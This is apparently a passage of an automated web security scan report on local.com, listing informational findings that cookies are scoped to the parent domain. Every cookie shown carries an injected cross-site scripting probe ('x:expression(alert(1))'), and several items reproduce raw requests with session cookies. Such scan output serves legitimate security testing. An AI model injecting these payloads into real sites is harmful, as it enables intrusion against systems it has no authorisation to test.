The following cookies were issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186605902360; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.8. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/amegy-bank-97648000/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.9. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.10. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/equity-bank-63975058/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.11. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/hillcrest-bank-104826937/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.12. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/sterling-bank-16856575/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.13. http://www.local.com/business/results/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/results/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fbusiness%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.14. http://www.local.com/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/contact.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.15. http://www.local.com/coupons/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&coupons.kw=; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.16. http://www.local.com/coupons/printable/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/printable/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.17. http://www.local.com/details/photos/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/amegy-bank-97648000/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /details/photos/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

7.18. http://www.local.com/details/photos/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /details/photos/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

7.19. http://www.local.com/details/photos/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/equity-bank-63975058/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /details/photos/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

7.20. http://www.local.com/details/photos/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/hillcrest-bank-104826937/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /details/photos/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

7.21. http://www.local.com/details/photos/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/sterling-bank-16856575/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /details/photos/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

7.22. http://www.local.com/dialogs/account/acctreg.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dialogs/account/acctreg.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dialogs/account/acctreg.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

7.23. http://www.local.com/dialogs/network.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dialogs/network.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dialogs/network.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
